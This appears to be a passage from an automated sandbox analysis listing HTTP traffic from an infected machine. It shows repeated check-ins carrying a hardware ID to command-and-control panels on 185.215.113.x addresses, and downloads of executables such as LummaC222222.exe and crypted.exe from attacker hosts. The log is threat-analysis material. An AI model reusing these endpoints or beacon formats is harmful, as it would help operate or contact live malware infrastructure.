Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 2d 2d 0d 0a Data Ascii: ------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="build"save------JDAFBKECAKFCAAAKJDAK--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117If-Modified-Since: Thu, 12 Sep 2024 13:56:06 GMTIf-None-Match: "66e2f2f6-414a00"
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000191001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000191001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000191001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 32 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000254001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /dobre/acentric.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000284001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000285001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /dobre/splwow64.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000287001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/crypted.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000290001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.100
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000308001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/LummaC222222.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 2d 2d 0d 0a Data Ascii: ------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="build"save------IIJKJDAFHJDHIEBGCFID--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000314001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /malesa/66ed86be077bb_12.exe HTTP/1.1Host: 147.45.44.104
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 31 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000318001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Files/2.exe HTTP/1.1Host: 103.130.147.211
